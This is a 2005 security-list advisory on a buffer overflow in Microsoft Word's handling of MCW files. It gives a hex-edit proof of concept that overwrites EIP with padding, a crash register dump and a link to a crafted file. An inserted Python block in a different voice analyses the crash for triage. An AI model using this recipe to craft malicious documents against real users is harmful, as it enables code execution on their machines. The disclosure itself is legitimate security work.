[NT] MS Word Unicode Buffer Overflow (MCW)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/05

    To: list@securiteam.com
    Date: 26 May 2005 18:20:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      MS Word Unicode Buffer Overflow (MCW)
    ------------------------------------------------------------------------

    SUMMARY

    Microsoft Word is "a word processor program from Microsoft. It was
    originally written by Richard Brodie for IBM PC computers running DOS in
    1983. Later versions were created for the Apple Macintosh (1984), SCO
    UNIX, and Microsoft Windows (1989). It became part of the Microsoft Office
    suite".

    Microsoft Word is vulnerable to a buffer overflow while opening a maliciously
    crafted Unicode MCW (Word for Macintosh Document) file.

    DETAILS

    Vulnerable Systems:
     * Winword.exe version 10.2627.6714 and prior

    Immune Systems:
     * Microsoft Word 2002 Service Pack 3

    The Unicode buffer overflow occurs when the user opens a malformed MCW
    document.

    Proof of concept:
    Modify the MCW file with a binary (hex) editor as follows; these lines were
    taken from an MCW file:
    c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
    00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
    11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
    00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77

    Change them as follows:
    c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
    00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
    11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
    61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73

    EAX = 00000000 EBX = 00000000 ECX = 00000006
    EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
    EIP = 00410041 ESP = 00126110 EBP = 00410041
    EFL = 00000246
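    The register dump above is the part of this advisory a defender can learn the most from: EIP and EBP both hold 00410041, which is the 0x41 ('A') padding after it has been widened to UTF-16LE (41 00 41 00), so the overflowing copy runs through a narrow-to-wide conversion, which is what the "Unicode" in the title refers to. The following is an added Python example, not code from the advisory or from Bahaa Naamneh. It parses the two hex dumps quoted above, applies a crude "long run of one printable byte" sanity check to them (a generic heuristic, not knowledge of the MCW format, which is an assumption on my part), models the widening, and shows a crash-triage helper that recognises registers whose contents look like widened ASCII text. The register values are the ones from the advisory.

```python
from __future__ import annotations

import struct

# Hex dumps copied from the advisory: the bytes as they appear in an MCW file
# and the same region after the proof-of-concept modification.
ORIGINAL_HEX = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
"""

MODIFIED_HEX = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
"""

# Register values from the crash shown in the advisory.
CRASH_REGISTERS = {
    "EAX": 0x00000000, "EBX": 0x00000000, "ECX": 0x00000006,
    "EDX": 0x7C90EB94, "ESI": 0x00000001, "EDI": 0x001262B0,
    "EIP": 0x00410041, "ESP": 0x00126110, "EBP": 0x00410041,
    "EFL": 0x00000246,
}


def parse_hex_dump(text: str) -> bytes:
    """Turn a whitespace-separated hex dump into raw bytes."""
    return bytes(int(tok, 16) for tok in text.split())


def longest_printable_run(data: bytes) -> tuple[int, int | None]:
    """Length and value of the longest run of one repeated printable ASCII byte.

    A long run of a single printable byte where a short text field is expected
    is a crude but useful sign of a padded or fuzzed document field. This is a
    generic heuristic and assumes nothing about the MCW layout.
    """
    best_len, best_byte = 0, None
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if 0x20 <= data[i] <= 0x7E and j - i > best_len:
            best_len, best_byte = j - i, data[i]
        i = j
    return best_len, best_byte


def widen_to_utf16le(narrow: bytes) -> bytes:
    """Model the narrow-to-wide conversion a "Unicode" overflow passes through:
    every byte becomes a 16-bit little-endian code unit (0x41 -> 41 00)."""
    return narrow.decode("latin-1").encode("utf-16-le")


def dword_after_widening(narrow: bytes, offset: int) -> int:
    """Read the 32-bit little-endian value at `offset` of the widened buffer,
    which is what an overwritten saved return address or frame pointer holds."""
    return struct.unpack_from("<I", widen_to_utf16le(narrow), offset)[0]


def widened_ascii_origin(value: int) -> bytes | None:
    """If a 32-bit register holds two UTF-16-widened printable ASCII bytes
    (shape 00XX00YY), return those two original bytes; otherwise None."""
    b = struct.pack("<I", value)  # b[0] is the low byte
    if b[1] == 0 and b[3] == 0 and 0x20 <= b[0] <= 0x7E and 0x20 <= b[2] <= 0x7E:
        return bytes([b[0], b[2]])
    return None


def triage_registers(regs: dict[str, int]) -> dict[str, bytes]:
    """Registers whose contents look like widened text from the input file."""
    return {name: origin for name, val in regs.items()
            if (origin := widened_ascii_origin(val)) is not None}


if __name__ == "__main__":
    print("original :", longest_printable_run(parse_hex_dump(ORIGINAL_HEX)))
    print("modified :", longest_printable_run(parse_hex_dump(MODIFIED_HEX)))
    print("EIP from 'A'*100 after widening: %08X" % dword_after_widening(b"A" * 100, 0))
    print("widened registers:", triage_registers(CRASH_REGISTERS))
```

    The run check reports a two-byte run ('aa' in "Bahaa") for the original bytes and a 100-byte run of 0x41 for the modified ones, and the triage helper flags exactly EIP and EBP, which tells an analyst both that control flow was hijacked and that the controlling bytes reached the stack as UTF-16 code units.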

    A modified MCW file can be downloaded from:
    http://study.haifa.ac.il/~bnaamnih/word/foo.mcw

    ADDITIONAL INFORMATION

    The information has been provided by Bahaa Naamneh (b_naamneh@hotmail.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

